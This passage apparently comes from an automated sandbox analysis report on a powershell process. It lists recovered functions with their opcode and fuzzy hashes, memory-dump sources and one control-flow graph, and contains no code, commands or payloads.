        • Instruction ID: 17c5c62720b3baf1942141620e347a0df8a70615e7853c295ffe1cc988c2e035
        • Opcode Fuzzy Hash: 12e5513aabf9efe4fee87539019e3a23b528554bb67fd69ace16e5426a489795
        • Instruction Fuzzy Hash: D92148716093059FC702DB70E864ADF7FB2EF86258F00046AD9009B251DB399849CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EF7E06 Relevance: .2, Instructions: 226COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 957 7ef7e06-7ef7e18 958 7ef7e1e-7ef7e29 957->958 959 7ef8691-7ef86f4 957->959 960 7ef7e2b-7ef7e3a 958->960 961 7ef7e76 958->961 980 7ef8717-7ef871e 959->980 981 7ef86f6-7ef8710 959->981 962 7ef7e7d-7ef7e86 960->962 963 7ef7e3c-7ef7e61 960->963 961->962 965 7ef7f7d-7ef7fc9 962->965 966 7ef7e8c-7ef7eda 962->966 985 7ef7fcf-7ef8007 965->985 986 7ef806c-7ef8088 965->986 983 7ef7edc-7ef7f0c 966->983 984 7ef7f3a-7ef7f75 966->984 981->980 997 7ef7f0e-7ef7f1d 983->997 998 7ef7f28-7ef7f37 983->998 1010 7ef7f77 call 7ef967a 984->1010 1011 7ef7f77 call 7ef9408 984->1011 1012 7ef7f77 call 7ef93f8 984->1012 1013 7ef7f77 call 7ef9888 984->1013 1014 7ef7f77 call 7ef96c4 984->1014 1000 7ef801b-7ef8066 985->1000 1001 7ef8009-7ef8017 985->1001 991 7ef808a 986->991 992 7ef8096 986->992 991->992 992->959 997->998 1000->985 1000->986 1001->1000 1004 7ef8019 1001->1004 1004->1000 1010->965 1011->965 1012->965 1013->965 1014->965
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7ae5a4c4f04d5dae08e6cc2c81d7c05d81bbf89ed920549af51561148c7f983f
        • Instruction ID: b2750f83344ec9f53de8f02f120df48ab11b81d5adaf3be1be950f12e77c9ce2
        • Opcode Fuzzy Hash: 7ae5a4c4f04d5dae08e6cc2c81d7c05d81bbf89ed920549af51561148c7f983f
        • Instruction Fuzzy Hash: 33917D75A01219CFEB14DB64D854B9AB7B2FF88314F1481A9DA09E7290DB349D85CF60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 084538C3 Relevance: .1, Instructions: 138COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761666414.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_8450000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b903a6f43ce00bb2635e9402a44672a25fa33e861378cd51f37e936601697e88
        • Instruction ID: 6a3fb52e4e795ec51ab46b89697d0e9e54ee16b8c694c163fe0209b4f6278d4a
        • Opcode Fuzzy Hash: b903a6f43ce00bb2635e9402a44672a25fa33e861378cd51f37e936601697e88
        • Instruction Fuzzy Hash: E9518D34A00309DFDB19DFA4D855AAEB7B2BF85345F24852EE805AB351DB74EC42CB80
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EF5748 Relevance: .1, Instructions: 103COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 88a928a5e6ead3f0cc0f3c069a502f5fac3b0a59728a3ce3ff776a26624dd4e9
        • Instruction ID: 85b7885347f44d4997471399f35916a1ce65c0dafa7dc67754bfc1df48bec952
        • Opcode Fuzzy Hash: 88a928a5e6ead3f0cc0f3c069a502f5fac3b0a59728a3ce3ff776a26624dd4e9
        • Instruction Fuzzy Hash: E0418DB4E01209DBDB14DBB4D440AAEB776EF91304F109978D505AB351DF38A986CF61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EF5747 Relevance: .1, Instructions: 62COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1643b60d97f464532cbb8ebc06ec38aa1b9d1dbd7eb9d3a04359d599fd4bf1db
        • Instruction ID: 8ebd11fe5da559a5d84d9446809fc7320a47d7eb1d6accc850604ace535ddea6
        • Opcode Fuzzy Hash: 1643b60d97f464532cbb8ebc06ec38aa1b9d1dbd7eb9d3a04359d599fd4bf1db
        • Instruction Fuzzy Hash: 99218078A013099BEB15EBB4D850BAE7773EF81309F105878D6056F780DF38A9468F62
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EF5D80 Relevance: .1, Instructions: 51COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4b28b961d823cfda9f5b5cca00eb82e4ac76fbc3e27b2666ecd7a73ebb7d49a6
        • Instruction ID: 1e35d9ec3a1076cd619da8c14a11a509aa02ed9e950919c74952fc7b77a1fd3d
        • Opcode Fuzzy Hash: 4b28b961d823cfda9f5b5cca00eb82e4ac76fbc3e27b2666ecd7a73ebb7d49a6
        • Instruction Fuzzy Hash: 87012836A193885FD7275638ACA80D97FB6DFCA211B0640FBC446D7641DA798C0BC792
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0325D01D Relevance: .0, Instructions: 45COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.756190219.000000000325D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0325D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_325d000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e4c6edd20dbd3ec0d4e84ef69e6093e0733baf7b40b349efe7bf18767e01827a
        • Instruction ID: 082c1052d0ed70388565d19ceabc63232ec07d52cd2c201c5004093b78509b96
        • Opcode Fuzzy Hash: e4c6edd20dbd3ec0d4e84ef69e6093e0733baf7b40b349efe7bf18767e01827a
        • Instruction Fuzzy Hash: 6601A7724283509BD710CA15DCC4B66FB98EF46374F08C45AFD095B286C3B99A86C6F1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0325D006 Relevance: .0, Instructions: 43COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.756190219.000000000325D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0325D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_325d000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 375c367a08ca7ad5a0e9a78a46406c11a3946a2ba3940b4dd4ce0b37ffec008d
        • Instruction ID: 6add0fa72f6487b4264b05fe0279df0b6ce6771b6c4e8adccd40edbc79bcb250
        • Opcode Fuzzy Hash: 375c367a08ca7ad5a0e9a78a46406c11a3946a2ba3940b4dd4ce0b37ffec008d
        • Instruction Fuzzy Hash: 0D01526240D3C05FD7168B218C94752BFB8EF53224F0D80DBE9848F297C2795944C7B2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EFF900 Relevance: .0, Instructions: 37COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 217c61bfdfd8b1408a2595a0b8755e7de29874ad4be5f021103accf4b31fe431
        • Instruction ID: f7de30914f2f88e895289ec87e8cb4de5d812d17ba59e4636861c5f92d077785
        • Opcode Fuzzy Hash: 217c61bfdfd8b1408a2595a0b8755e7de29874ad4be5f021103accf4b31fe431
        • Instruction Fuzzy Hash: 6FF02479A0A2805FC3139774A4608C83F70DF4712971710C3D645CFAB3D5248C458392
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EFFA10 Relevance: .0, Instructions: 36COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6ea5a5df380ce28d9c359b7873d2e877619263e07104494d8332f653d83091ac
        • Instruction ID: ff643f7b176ed73a6c5e59471bb07e394c88fd4c499da588fa24fca9d37f0fb6
        • Opcode Fuzzy Hash: 6ea5a5df380ce28d9c359b7873d2e877619263e07104494d8332f653d83091ac
        • Instruction Fuzzy Hash: 7FF02E763092449FCB051BBA9848CAB7FA9DFDE7513048025F64DCB251CE358D128371
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EF5DA8 Relevance: .0, Instructions: 30COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d95b4896eeadba3df04bcc2c02bef8aea9ad79945c8cade9fcf6d947f70e7c16
        • Instruction ID: 94a4ef333eb286d9c963e17dacf6683ff203a579655019b6aa2e607291343469
        • Opcode Fuzzy Hash: d95b4896eeadba3df04bcc2c02bef8aea9ad79945c8cade9fcf6d947f70e7c16
        • Instruction Fuzzy Hash: 15E0E53670021897CB146678DC145EE77AAEBC8251F04007ED902E3740DFB5DC05CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EFFA00 Relevance: .0, Instructions: 27COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2f15ab1006c650890c7e878e8b2f182f1ff5831608a2417cfe2f417ada8c3601
        • Instruction ID: 6175f8799abf2acbcef9a65e616ede1e49d9223c30b206f1d053cdcceea0eb87
        • Opcode Fuzzy Hash: 2f15ab1006c650890c7e878e8b2f182f1ff5831608a2417cfe2f417ada8c3601
        • Instruction Fuzzy Hash: BAE02233306680AB8B114F8AAC44C8BBF69EF8A264309402AF608C7911CA314D1187A1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0845083A Relevance: .0, Instructions: 19COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761666414.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_8450000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ad686316755a4664b61a75cac9cb56f3efdc507930347330206b1e81a94966a9
        • Instruction ID: 08ce227a772e1f1f44aaaa12940dcba869b6a4b3d16de5094bf083d2fc4dab36
        • Opcode Fuzzy Hash: ad686316755a4664b61a75cac9cb56f3efdc507930347330206b1e81a94966a9
        • Instruction Fuzzy Hash: 42E0C27A6003008BCB04E760F4497BE7363DFC4356F004879D655C7680DB38A9474791
        Uniqueness

        Uniqueness Score: -1.00%

        Function 07EFF928 Relevance: .0, Instructions: 16COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 050ff731d6b0d041cde9607d59d694a10cf7852650f946f8e3085aaeff4ab5be
        • Instruction ID: bab65a88557182453340f521717e84c2377372bdee9dd0e79bf12c85801cf65e
        • Opcode Fuzzy Hash: 050ff731d6b0d041cde9607d59d694a10cf7852650f946f8e3085aaeff4ab5be
        • Instruction Fuzzy Hash: 31D05E3D2101149FC345EB68E508E4577A9EB882617014095EA0987321CB75EC008B91
        Uniqueness

        Uniqueness Score: -1.00%